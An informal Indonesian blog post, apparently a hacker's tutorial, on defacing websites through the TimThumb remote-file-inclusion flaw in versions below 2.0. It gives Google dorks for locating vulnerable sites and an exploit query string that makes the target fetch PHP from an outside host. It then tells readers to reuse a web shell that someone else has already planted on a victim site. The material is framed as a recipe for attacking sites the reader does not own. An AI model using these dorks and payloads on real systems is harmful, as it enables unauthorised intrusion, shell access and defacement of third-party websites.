Deface POC Timthumb

Dvn404
December 16, 2020



Assalamualaikum Gaessss......

Nih Gw mau Ngasih Sedikit Tutor Deface, Metode Timthumb, Next!
Timthumb adalah Metode Deface yang memanfaatkan pada timthumb.php Metode ini work di Versi 2.0 kebawah, Langsung aja siapin Dork Sama Exploit.....

1. Dork

inurl:/timthimb.php site:vn
inurl:/timthimb.php site:com
/wp-content/themes/xiaondo-one/thumb.php

2. Exploit

?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php


Kalo Mau dorking Di google Image aja, Enak :v



Kalo dah Dapet Web, Buka Website nya, Terus Tekan Ctrl+U Buat View Source, nah Abis tu Tinggal Cari Kata Kunci Timthumb


Check Dulu, Timthumb versi berapa, Kalo 2.0 Keatas Ngga bisa


Kalo masih dibawah 2.0 Bisa :v


Next! Abis Check Versi sekarang tinggal nambahin Exploit


Kebetulan aja nihhh... Udah ada yang tanem Shell :v. Jadi yaa Langsung aja, Pake tuh akses


Segitu aja, ngga usah banyak2 :v... See You Next Time Brother :)

Wassalamualaikum....